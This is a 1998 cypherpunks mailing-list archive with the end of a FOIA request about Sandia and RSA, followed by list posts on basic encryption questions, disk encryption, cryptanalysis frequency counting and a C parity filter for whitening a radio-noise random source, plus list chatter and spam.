responsibility for directorship from Robert Clem.

Sandia supervisor Tom Wright replaced my supervisor, John Holovka, 
who was the supervisor for the CTBT seismic data authenticator.

Wright brought in Ph.D. Steven Goldsmith to supervise me.

Sellars, Wright, and Goldsmith were new to crypto-type projects.

Much of this is documented at http://www.jya.com/whp021598.htm.

This is evidenced by Sellar's attached SEP 24 1991 memorandum,
which Goldsmith help author, addressed to Dr James J Hearn at 
the National Security Agency.

The SEP 24 memorandum contained a number of technical errors.

I corrected these errors in my attached December 20, 1991 memorandum.

Department of Energy and it predecessors have a well-documented
history of not requiring technical expertise for pursuit of interests.

Stewart Udall, The Myths of August, writes,

    Any cover-up must be implemented and enforced by designated
  agents, and one man emerged in 1953 as the quarterback of the 
  AEC's damage-control effort.  His name was Gordon Dunning.
  Although the personnel charts of the 1950s list him as a low-level 
  "rad-safe" official in the Division of Biology and Medicine,           
  documents demonstrate that he was clothed with authority to    
  manage and suppress information about the radiation released
  by the testing of nuclear weapons. ...

About the time Sellers and Sandia Ombudsman gave me a directed
transfer to break electronic locks for the FBI/ERF [engineering
research facility], Goldsmith and Wright, certainly with the approval
of Sellers, placed a contract with RSA Inc [http://www.rsa.com/], 
I was told.

Ms Barfield, we think the American public needs to know more about
RSA's work with Sandia National Laboratories.

Therefore, Under the provision of the Freedom of Information Act, 
5 USC 552, I am requesting access to: 

  1 ALL purchase requisitions, including any attached statement of
    work, issued by Sandia National Laboratories, Los Alamos     
    National Laboratories, or DOE/ALOO between January 1, 1991
    and February 17, 1998 to RSA Inc.

  2  Copies of all invoices from RSA Inc received by Sandia National   
     Laboratories, Los Alamos National Laboratories, or DOE/ALOO 
     between January 1, 1991  and February 17, 1998

If there are any fees for searching for, or copying, the records 
I have requested, please inform me before you fill the request.

As you know, the Act permits you to reduce or waive the fees 
when the release of the information is considered as "primarily 
benefiting the public."  I believe that this requests fits that 
category and I therefore ask that you waive any fees.

Your office agreed to waive fees before.  This request is surely 
of "public interest."

December 13, 1994 DOE/AL FOIA officer Gwen Schreiner waived fees
for the reason,

        "We have considered your request and have determined that
        release of the requested records is in the public interest,
        that disclosure of this information is likely to contribute
        significantly to public understanding of the operations or
        activities of the government, that you or the organization
        you represent have little or no commercial interest in the
        material contained in the records, that you or the
        organization you represent have the qualifications and
        ability to use and disseminate the information, and that the
        records are not currently in the public domain.  A waiver of
        fees is therefore granted."

This waiver of fees was, undoubtedly, issued as a result of former
Energy Secretary Hazel O'Leary's Openness initiative.

Heart of America paid my way to hear Secretary O'Leary's celebrated
whistleblower speech.

If all or any part of this request is denied, please cite the 
specific exemption(s) which you think justifies your refusal to 
release the information and inform me of your agency's 
administrative appeal procedures available to me under the law.

I would appreciate your handling this request as quickly as 
possible, and I look forward to hearing from you within 20 
working days, as the law stipulates.

Sincerely,                         
                                   


William Payne
13015 Calle de Sandias
Albuquerque, NM 87111



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 5 Aug 1998 01:05:44 -0700 (PDT)
To: Anonymous <nobody@replay.com>
Subject: encryption.....
In-Reply-To: <199808050520.HAA22850@replay.com>
Message-ID: <Pine.GSO.3.96.980805150926.11130A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


What types of data can we encrypt?
   


















===============================================================================
You give the words  you have spoken,
   it is not lended and are not taken back.
It is like what The Corrs sung "...you're forgiven not forgotten...."

bbt@mudspring.uplb.edu.ph
bbt@peak-two.uplb.edu.ph
metaphone@altavista.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "LOUISE E LIBERATORE" <CALLMEB00@prodigy.net>
Date: Wed, 5 Aug 1998 14:17:59 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: iz it
Message-ID: <199808052115.RAA41932@pimout1-int.prodigy.net>
MIME-Version: 1.0
Content-Type: text/plain


What R dezz    Algorithms 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rhobbs@wvu.edu
Date: Wed, 5 Aug 1998 13:32:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GATT
Message-ID: <3.0.3.32.19980805163248.006988ec@wvu.edu>
MIME-Version: 1.0
Content-Type: text/plain


How about e-mailing me a GATT summary for my MBA paper!!!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 5 Aug 1998 16:55:56 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: iz it
In-Reply-To: <199808052115.RAA41932@pimout1-int.prodigy.net>
Message-ID: <v0313031bb1eea10067f8@[209.66.100.109]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:16 AM -0700 8/5/98, LOUISE E LIBERATORE, a true Prodigy,  wrote:
>What R dezz    Algorithms

Dezz algrims iz de 'bonics word (word!) foe de Man's main code.

Word.

--Rap Master Tim





"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Wed, 5 Aug 1998 07:56:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SecDrv and Win95
Message-ID: <199808051456.QAA15760@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199808050819.KAA06317@replay.com> you wrote:

: I'm looking for a good HD encryptor.  The best one seems to be secdrv,
:  Is this compatoble with win95? I'm asking because I know secdrv uses
: tsr programs and drivers, but I am not familiar enough with win 95 to
: be sure they will work together.  In win programming you don't use
: interrupts and I'm sure that the drivers try to capture interupts. it
: could still work if win95 calls int's to do it's work though.  Any info?


Checkout:
ftp://ftp.replay.com/pub/crypto/disk/{SdWin32Src.zip,SdDriveSrc.zip}

-aj-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <fishlist@fishroute.com>
Date: Wed, 5 Aug 1998 09:14:30 -0700 (PDT)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Welcome to the fishroute list.
Message-ID: <199808051614.JAA27813@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



This email message gives you important information about using
this list - please save it for future reference.


Sending mail to the list
========================

To send a message to all fishroute list members, use a message
with the following form (the email address is case insensitive):

 --------------------------------------------------------------
       From: Brian Dorricott <brian@net-shopper.co.uk>
         To: fishroute@fishroute.com
    Subject: PROBLEM WITH LOADING PRODUCT

    Can anybody help me unzip my file?
 --------------------------------------------------------------


Leaving the list
================

To stop receiving messages from fishroute you will need to send
a message to the list manager called "fishlist@fishroute.com" with
a command to remove you from the list.  The list manager controls
who belongs to the list.  For example:

 --------------------------------------------------------------
       From: Brian Dorricott <brian@net-shopper.co.uk>
         To: fishlist@fishroute.com
    Subject: <not needed>

    leave fishroute
 --------------------------------------------------------------

If you receive a message saying you are not a member but you are still
getting messages, you could be subscribed as a different email address.
In one of the errant messages, check for the "X-ListMember:" clause in
the header of the message.  It will have the form:

    X-listMember: brian@abc.co.uk [fishroute@fishroute.com]

which means that this message was from the list called "fishroute"
and sent to the email address "brian@abc.co.uk".  You can now leave the
list by sending the message:

 --------------------------------------------------------------
       From: Brian Dorricott <brian@net-shopper.co.uk>
         To: fishlist@fishroute.com
    Subject: <not needed>

    leave fishroute brian@abc.co.uk
 --------------------------------------------------------------


Requesting digests
==================

Instead of getting each message from the list seperately, you may ask
the list server to send you a compendium of all the messages that were
sent that day.  To do this, send a message to the list server with the
command "DIGEST".  For example:

 --------------------------------------------------------------
       From: Brian Dorricott <brian@net-shopper.co.uk>
         To: fishlist@fishroute.com
    Subject: <not needed>

    digest fishroute
 --------------------------------------------------------------

The list manager will send you a confirmation message back and every
24-hours you will receive a single email message with a contents
and each message listed in it.


Requesting Files
================

This list has a set of files associated with it.  These files may
contain new software releases, frequently asked questions etc.  The
list server provides two commands to allow you to collect these file:
DIR and GET.  If you wish to obtainly a list of all the files associated
with this list, send the following message to the list manager:

 --------------------------------------------------------------
       From: Brian Dorricott <brian@net-shopper.co.uk>
         To: fishlist@fishroute.com
    Subject: <not needed>

    dir fishroute
 --------------------------------------------------------------

In return, you will get two messages.  One is a transaction
report (telling you the command was completed) and the second will be
titled "Directory for fishroute" and would have a contents like:

 --------------------------------------------------------------
    Directory for the list fishroute

      1         INML301C.ZIP  2535788 bytes
      2         INML302D.ZIP  2671264 bytes

    Directory for fishroute has 2 entries.
 --------------------------------------------------------------

Now you know the names of the files, you can request one to be sent
to you using the GET command.  Taking the example of INML301C.ZIP,
we could use the command:

 --------------------------------------------------------------
       From: Brian Dorricott <brian@net-shopper.co.uk>
         To: fishlist@fishroute.com
    Subject: <not needed>

    get fishroute inml301c.zip
 --------------------------------------------------------------

Again, you will get two messages - the transaction report and a
message containing the MIME encoded file (or the file if it is a text
file).


Where to report problems
========================

Should you still have any problems or questions, please email
root@fishroute.com who will be happy to help.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Wed, 5 Aug 1998 11:47:02 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Jim Bell Latest
In-Reply-To: <199808051340.JAA25381@camel14.mindspring.com>
Message-ID: <Pine.BSF.3.96.980805180740.2083H-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Aug 1998, John Young reported

>Excerpt from USA v. Jim Bell court docket:
>
    lots of deletions.

>Docket as of August 5, 1998 3:10 am               Pages 7-8
>
>                 Bell.  Court rules this hrg will proceed on the violations
>                 charges only, D' concerns should be addressed in other
>                 action.  Court inquires of cnsl if psychological evaluation
>                 is required, D' cnsl adv the cour that D' does not feel this
>                 hrg should proc because of his prior stated concerns of the
>                 Gov't spying and conspiracy against him. D' request add'l
>                 time to prep.  
>
    IM!SHO, Jim is committing the ultimate faux pas in federal court --the
    issue of 'conspiracy' as it implies the judge is part of the conspiracy.
    of course, I dont consider the issues as conspiracy anyway --they are
    nothing more than a government abusing its powers and the fact the
    citizens have abrogated their own rights by failing to make government
    accountable


>		  RECESS. D' cnsl adv the Court that D' not
>                 prep to proc today, D' requests month continuance, D' cnsl
>                 disagrees w/client's strategy. D' cnsl adv the Court mental
>                 health eval may be approp. 
>
    the wonders of a public defender...  Kaczinski's lawyer pulled the same
    abuse of privilege (except again IM!SHO, TZ outsmarted them all as even
    in his apparent paranoia driven state, his powers of logic were stil
    present --and there is reason to doubt his implied state of insanity
    in so much as his notebooks showed bitterness and a bloodthirsty desire
    for violent retribution.

    OTH, Bell definetly lacks sophistication, or a reasonable sense of
    logic; if there is a mental illness issue, it is not the place of Bell's
    attorney to overrule his client's wishes --Bell is entitled to be the
    fool....

    but even worse, sliding into the federal prison systems psychiatric t
    evaluation program is a one way ticket --all bets are off, and all
    sentence termination dates are off-- release is at the whim of the
    government. if, for instance, Jim is sent to Springfield (MO) or 
    Rochester (MN), the cell blocks are essential solitary confinement 
    rows --if you werent nuts when you arrived, you are or will be...

    Jim's attorney may have been well meaning by asking for help of Jim,
    but he sure as hell did not do him any favours.

>		  Gov't objs. Court adv parties
>                 that mental health eval will be ordered. 


>                 D' adv the Court he
>                 wants investigation of Gov't actions. 
>
    still whipping a dead horse.  Jim's AP essays were not an evidence
    of insanity- a little asinine, but certainly not insane rantings.
    many members of the list can say: "there but for the grace of (insert
    your favourite whatever), go I."


>                 Court adv D' mental
>                 health eval ordered.  
>
    exactly to form...


>		  Court orders Gov't to prep approp
>                 order, iss of Mr. Avenia cont as cnsl will be addr. D'
>                 remanded pending eval. (car) 
>
    this is one of the travesties of the Public Defender system; Jim will
    be evaLuated only by the US Prison system (which has a vested interest
    in maintain the numbers (despite the current 24% overcrowding figure I
    saw quoted the other day).

    there will be no report actually representing Jim's or his families
    interests.  there will be no period when an outside investigator can
    evaluate Jim when he can be absolutely sure the government has not
    loaded him with Thorazine 

    an undiseased mind looking out through the haze of Thorazine must be
    terrorizing; the victim clawing at the walls of the cranium --or so
    it was described to me by my Tourettes' Syndrome victim son who was
    given same in an acute facility  --I had been in hospital with 
    bronchial infections and did not see him until two weeks later at
    the resident school I arranged-- absolutely terrifying; the Haldol
    was discontinued immediately; absolutely unbelievable what it did

    prisons and other institutions love Thorazine class drugs for 
    troublemakers --instant passivity, and in Jim's case, an obvious
    means of declaring him criminally insane which is a life sentence
    in the federal system, one way or another.

    I wish Jim luck, he needs it; I dont agree with his "politics", but
    I also do agree with their punishment of his inadequacies and childish
    pranks.


> 		  [Entry date 08/03/98]
>                 [Edit date 08/03/98]
>
>8/3/98   --      LODGED ORDER directing commitment of D' to submit to a
>                 competency exam (car) [Entry date 08/04/98]
>

	attila out...


_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Wed, 5 Aug 1998 12:48:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SecDrv and Win95
In-Reply-To: <98Aug5.115014cdt.36865-1@gateway.mgmtscience.com>
Message-ID: <19980805194724.13516.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Ian F Silver <silveri@mgmtscience.com> writes:

  > I'm looking at CFS (Cryptographic File System) for when I make the
  > jump away from Microsoft towards S.u.S.E. Linux 5.2.

Version 1.1.2 works quite well, but I'd really like to see someone
build it into the kernel.  (Not me, alas: I'm up to my ears in other
GPL applications development, and you really don't want to let me near
an OS kernel...)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "fishlist@fishroute.com" <fishlist@fishroute.com>
Date: Wed, 5 Aug 1998 11:24:49 -0700 (PDT)
To: "cypherpunks@toad.com>
Subject: List Processor Results.
Message-ID: <199808051824.LAA28730@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 1: leave fishroute cypherpunks@toad.com
    Removed from fishroute.


Completed processing request at Wed, 5 Aug 1998 20:29:25 +0200





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <null@fishroute.com> (fishroute)
Date: Wed, 5 Aug 1998 11:26:29 -0700 (PDT)
To: "cypherpunks@toad.com>
Subject: Leaving the fishroute list.
Message-ID: <199808051824.LAA28729@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for your participation in this list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Wed, 5 Aug 1998 18:23:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Noise source processing
Message-ID: <Pine.LNX.3.96.980805210406.11770A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


Hello all..

After a little bit of work I have put together a white noise source 
(hacked FM reciever, heavily shielded to reduce local EMR bias) and
have it jacked into a mic port on one of my machines. I would like
to develop of bit of code (oh, horror :) to take bits from the sound
card, and bits from /dev/random, and mix them together to get a
random number stream.

The noise coming off of the sound card is more beige than white though..

Does anyone know of any papers, articles or whatever on good techniques to
remove bias from the audio source? 

My initial thoughts are along the lines of just hashing everything, but
this will be slow, and I'd like to see what other ideas are out there.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Let your life be a counter-friction to stop the machine."
			Henry David Thoreau "Civil Disobedience"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Wed, 5 Aug 1998 21:30:47 -0700 (PDT)
To: Maurice Valmont <Maurice@fundi.com>
Subject: Re: Mysterious taglines
In-Reply-To: <v0313031bb1eea10067f8@[209.66.100.109]>
Message-ID: <3.0.5.32.19980805213018.03c1dea0@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 PM 8/5/98 -0400, Maurice Valmont wrote:
>
>At 04:55 PM 8/5/98 -0700, Tim May <tcmay@got.net> wrote in his .sig:
>
>>"The tree of liberty must be watered periodically with the blood of
>>tyrants...."
>
>I suspect this is unlikely to happen until the oppressed realize that the
>tree 
>of liberty needs also be watered with the blood of patriots.

It also needs to be fertilized with the bullshit of propaganda and sprayed
with the insecticide of secrecy.

>>Crypto Anarchy: encryption, digital money,
>>anonymous networks, digital pseudonyms, zero
>>knowledge, reputations, information markets,
>>black markets, collapse of governments.
>
>I'm curious: What exactly is "zero knowledge"?

It is a protocol used by certain political and religious orders.  It can be
boiled down to "What I don't know, can't hurt me.".

---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@ebible.org>
Date: Wed, 5 Aug 1998 21:03:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Noise source processing
In-Reply-To: <Pine.LNX.3.96.980805210406.11770A-100000@albert>
Message-ID: <199808060403.XAA32439@yeti.host4u.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:12 PM 8/5/98 -0400, mgraffam@mhv.net wrote:
...
>After a little bit of work I have put together a white noise source 
>(hacked FM reciever, heavily shielded to reduce local EMR bias) and
>have it jacked into a mic port on one of my machines. I would like
>to develop of bit of code (oh, horror :) to take bits from the sound
>card, and bits from /dev/random, and mix them together to get a
>random number stream.
>
>The noise coming off of the sound card is more beige than white though..
>
>Does anyone know of any papers, articles or whatever on good techniques to
>remove bias from the audio source? 
...
If I were doing it, I would probably feed the raw bytes into a stream
cipher with feedback, like Sapphire II, and then select every nth byte from
the output stream (just to match the output bit rate to the estimated
actual entropy in a conservative fashion and improve the effective
avalanche performance of that particular algorithm). This would be faster
than a hash like SHA-1. Indeed, you could just use a good mixer, like a CRC
or non-cryptographic hash to whiten the noise if speed is an issue. As long
as you restrict the output bit rate to less than the actual estimated
entropy of the source, you should be alright, provided that your noise
source is as random as you think it is.

Then again, the truly paranoid may beg to differ.




_______

Michael Paul Johnson                   
mpj@ebible.org    http://ebible.org    http://cryptography.org
PO BOX 1151, Longmont CO 80502-1151, USA Jesus Christ is Lord!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wazoo Remailer <nobody@earth.wazoo.com>
Date: Wed, 5 Aug 1998 15:36:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: change in anonymizer log policy
Message-ID: <199808052236.WAA04031@earth.wazoo.com>
MIME-Version: 1.0
Content-Type: text/plain


Looks like Anonymizer's changed their logging policy.
>From their FAQ:

Does the Anonymizer keep logs on who I am and the sites I
visit? How long do you keep logs? Will you release the
information? 

The Anonymizer logs only a hash of your IP number (machine
address). We cannot determine your IP number from these logs,
however, this enables us to have logs to study in order to increase
performance, and as a deterent to prevent abusive use of the
Anonymizer for purposes such as e-mail spamming, harassment, and so
on. If we didn't, many people would use it for these purposes, and
the usability of the service would deteriorate as a result.
Anonymizer tools are not a shroud for those who wish to engage in
illegal and unscrupulous activities. However, due to high usage, it
is impossible for us to keep logs for very long, and we cannot
maintain archives. 

See our user agreement for more details. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Maurice Valmont <Maurice@fundi.com>
Date: Wed, 5 Aug 1998 20:54:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Mysterious taglines
In-Reply-To: <199808052115.RAA41932@pimout1-int.prodigy.net>
Message-ID: <3.0.1.32.19980805235420.0072fa34@mail.fundi.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 PM 8/5/98 -0700, Tim May <tcmay@got.net> wrote in his .sig:

>"The tree of liberty must be watered periodically with the blood of
>tyrants...."

I suspect this is unlikely to happen until the oppressed realize that the
tree 
of liberty needs also be watered with the blood of patriots.

>Crypto Anarchy: encryption, digital money,
>anonymous networks, digital pseudonyms, zero
>knowledge, reputations, information markets,
>black markets, collapse of governments.

I'm curious: What exactly is "zero knowledge"?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doris <dorisaw@idt.net>
Date: Wed, 5 Aug 1998 22:12:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Mysterious taglines
In-Reply-To: <199808052115.RAA41932@pimout1-int.prodigy.net>
Message-ID: <35C93B5F.CE468C1D@idt.net>
MIME-Version: 1.0
Content-Type: text/plain


Maurice Valmont wrote:
> 
> At 04:55 PM 8/5/98 -0700, Tim May <tcmay@got.net> wrote in his .sig:
> 
> >"The tree of liberty must be watered periodically with the blood of
> >tyrants...."
> 
> I suspect this is unlikely to happen until the oppressed realize that the
> tree
> of liberty needs also be watered with the blood of patriots.
> 
> >Crypto Anarchy: encryption, digital money,
> >anonymous networks, digital pseudonyms, zero
> >knowledge, reputations, information markets,
> >black markets, collapse of governments.

Aaaaah, a little jeopardy anyone?

da da da da
da da da da
da da da daDa!
da da da da

da da da da
da da da da
da da da daDa!
da da da da

da da da da
da da da da
da da da daDa!
da da da da

"Partnerships" for $100...
"What are the residual fX of ALL non prescription 
(that means recreational and damned fun if you went to
Woodstock or Monterey for the left coast..) drugs?"


> 
> I'm curious: What exactly is "zero knowledge"?

correct! 


"Central Intelligence Agency for $400!"

Duh?

Doris
http://idt.net/~dorisaw

Is there any way to get 2-bit site certicates to all these
darn websites? I wanna see my damn lock closed, even when
I browse my own damned site! hehe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcts@globalvisionexpo.com
Date: Wed, 5 Aug 1998 23:37:11 -0700 (PDT)
To: wcts@globalvisionexpo.com
Subject: Follow-up Letter
Message-ID: <199808060637.XAA00424@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From:  Charles H. Borden
President, GlobalVision
Sarasota, Florida

Please kindly direct to the Sales and Marketing Decision Maker

Please accept this important reminder as follow up to my letter of last week about GlobalVision's potential effective marketing of your firm on our upcoming world tour.  If you will recall, we promote "global-minded" companies at our exclusive overseas 'Direct from the USA' catalog expos.  Once you've registered, we will invite key overseas distributors, joint-venture partners, government buyers & licensees in your industry.  Remember, you stay home while we do the legwork.  We have space available for Mexico, Brazil, Argentina, Venezuela, Australia, Canada, Singapore, S. Africa, Chile & Colombia.  Plus we have World Catalog Trade Shows in Europe and Japan.  These special events are joint ventures with World Trade Centers Association.

Fees range from just $375-$695 per expo with a money back guarantee.  If you are considering doing business in any or all of the above markets please respond by E-mail today.  Simply hit your reply button and send us a short note.  Please be sure to include your NAME, COMPANY, AREA CODE and PHONE NUMBER.  Susan Khrystal, our V.P., will contact you by PHONE during business hours.

If you have received this message in error, please accept our apology.  If you wish to be excluded from future mailings, simply press your reply button and send us the word "remove" in the subject line.

Sincerely,

Charles Borden
President, GlobalVision







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 6 Aug 1998 03:44:52 -0700 (PDT)
To: Anonymous <bbt@mudspring.uplb.edu.ph>
Subject: RE: compression vs encryption
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8317@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> Bernardo B. Terrado[SMTP:bbt@mudspring.uplb.edu.ph]  seemed to write:
> 
> What's the difference between compression and encryption?

Eh?   Encryption means keeping things secret. Compression is keeping
them small.  Not the same thing at all.  OK, they might use some of the
same tools - but you can use a screwdriver to clean your nails.

> Correct me if I'm wrong,  in compression we lose something, like in 
> image compression and audio compression,  but in encryption, we don't.


Be corrected. You are wrong. There are ways of compressing that don't
lose anything (like PKzip that you might have heard of...). There  are
ways of encrypting that don't compress. (in fact you might not want
totally efficient compression in encryption because that might give an
eavesdropper clues as to the real length of the plaintext which could be
useful to them)

> > One sure protection againts evil hackers is encryption (?),
> but what if that evil hacker deletes the ciphertext file and the
> plain  text file (that is assuming the evil hacker just deletes 
> every file he wants to delete).

I go to the backup, that's what. If I care enough about a file to
encrypt it I care enough about it to back it up. Your hacker is doing
what they call a "denial of service" attack. Encrypting your files
doesn't make any difference is someone deletes them. You need different
defences against different kinds of attack.

Or was all this some sort of troll...

















> ======================================================================
> =========
> You give the words  you have spoken,
>    it is not lended and are not taken back.
> It is like what The Corrs sung "...you're forgiven not forgotten...."
> 
> bbt@mudspring.uplb.edu.ph
> bbt@peak-two.uplb.edu.ph
> metaphone@altavista.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Thu, 6 Aug 1998 06:03:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: text analysis
Message-ID: <9808061301.AA27007@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain


CyberPsychotic writes:
>  So I was playing with some crypto-analysis algorythms, and some steps of
> them involve such thing as finding out the frequency of some character or
> set of characters. So I wonder what would be the optimal (speed, resources
> etc)way of coding this. While playing with single character frequency, I
> guess the best way would be having unsigned int 256 elements array (I
> refer to C coding) and each time, I find certain character, i just
> increase the element of the array with this char offset. This seems very
> neat to me (except the thing that some chars could be never found in
> text). Anyways, when things come to 2 characters set, i have to get 1024
> character set, and so on, which looks quite unreasonable to me to allocate
> memory for elements, which probably will be never found in text... I was
> thinking of other solution and came to two way connected lists (correct
> term?)  things, i.e. : i have some structure like: 

The term is "linked list".  If you want to collect all the arbitrarily
long repeats you may have to resign yourself to a two-pass algorithm.
For small cryptograms like the ones I usually deal with, it's
sufficient to use an N^2 algorithm, looking at each starting point and
each possible offset to see whether a string of at least k characters
is duplicated at that offset.  For a longer file, off the top of my
head, you might start with a set of pointers for where each possible
digraph starts; you can use a linked list, storing all the starting
locations for each digraph (a two-dimensional array of pointers, total
size 64K).  On your second pass you can do an N^2 search within those
reduced sets to see which repeated digraphs can be extended.  It will
help a lot if your target ciphertext fits in memory.  I make no claim
that this is optimal.

	Jim Gillogly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Thu, 6 Aug 1998 07:31:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Noise source processing
In-Reply-To: <Pine.LNX.3.96.980805210406.11770A-100000@albert>
Message-ID: <3.0.5.32.19980806073033.007cf540@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:12 PM 8/5/98 -0400, mgraffam@mhv.net wrote:
>Hello all..
>
>After a little bit of work I have put together a white noise source 
>(hacked FM reciever, heavily shielded to reduce local EMR bias) and
>have it jacked into a mic port on one of my machines. I would like
>to develop of bit of code (oh, horror :) to take bits from the sound
>card, and bits from /dev/random, and mix them together to get a
>random number stream.
>
>The noise coming off of the sound card is more beige than white though..
>
>Does anyone know of any papers, articles or whatever on good techniques to
>remove bias from the audio source? 

Let me save you the trouble.  First, RFC 1750 gives some background
including the info-theory behind bit 'distillation'.

I have digitized FM radio hiss using a $10 transistor radio feeding
into the LINE in of my soundcard.  The spectrum looks poisson
with prominant, periodically spaced noise spikes.  It does not pass Diehard.

But if you take the PARITY of 8 bits to get one bit, then assemble bytes
out of these bits, the results pass Diehard.  

This works with 44Khz, 16 bit sampling, with full-volume hiss feeding the
soundcard.
I have yet to try this with a video adc sampling snow.

1. There are some nice spectrogramming shareware programs out there.
2. Diehard is invaluable.
3. Language is so vague.  Don't export this filter:


/*
Alemb.c
Alembic bit distiller
Takes 8 bytes, computes the parity of each, composes a byte from the bits.

2 Aug Ported from Alembic.java which I had prototyped earlier
3 Aug modified to be faster
*/

#include <stdio.h>
/* return parity of byte input */
int parity(int c)
{
	int i,p=0;
	for (i=0; i<8; i++) {
		p ^= c & 1;
		c >>= 1;
		}
	return p;
}



main(int argc, char **argv) {
	int c=0, p, n, i;
	int count=0, accum=0;
	int ones=0, zeroes=0;
	unsigned char parlut[256];
	unsigned char buff[8];
	FILE *fptr, *of;
	char *infname="test.wav";
	char *outfname="test.bin";
	int hist[256], max;

	if (argc>1) infname=argv[1];
	if (argc>2) outfname=argv[2];

    fprintf(stderr,"Alembic C 4 in=%s out=%s\n", infname, outfname);


	fptr = fopen(infname,  "rb");
       of   = fopen(outfname, "wb");

 	for (p=0; p<256; p++) { parlut[p]=parity(p); /*  initialize parity table */
							hist[p]=0;	}

	n=8;
	while (n==8) {

		n=fread(buff, 1,8, fptr);
		count += n;

		if (n==8) {
			for (i=0; i<8; i++) {
				p =  parlut[ buff[i] ] ;
				accum <<= 1;
				accum |= p;

				/* measure */
				if (p==1) ones++; else zeroes++;
				}
			 fwrite(&accum,1,1,of);
			 hist[accum]++;
			accum=0;

		}


	}

	printf("In: %0d bytes\n", count);
	printf("Out: %0d bytes\n", count/8);
	printf("output: 1's=%0d %0f% \n", ones, 100.0*ones/(ones+zeroes));
	printf("output: 0's=%0d %0f% \n", zeroes, 100.0*zeroes/(ones+zeroes));
	max=0;
	for (i=0; i<256; i++) {if (max<hist[i]) max=hist[i];}
	for (i=0; i<256; i++) {
		printf("%0d %0d %lf\n", i, hist[i], 100.0*hist[i]/max);
	}

}





honig@alum.mit.edu

  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Thu, 6 Aug 1998 03:37:30 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Half a mil for a spill:Clinton's expensive cock-up/Robber shoots own knob off
Message-ID: <19980806080000.26014.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

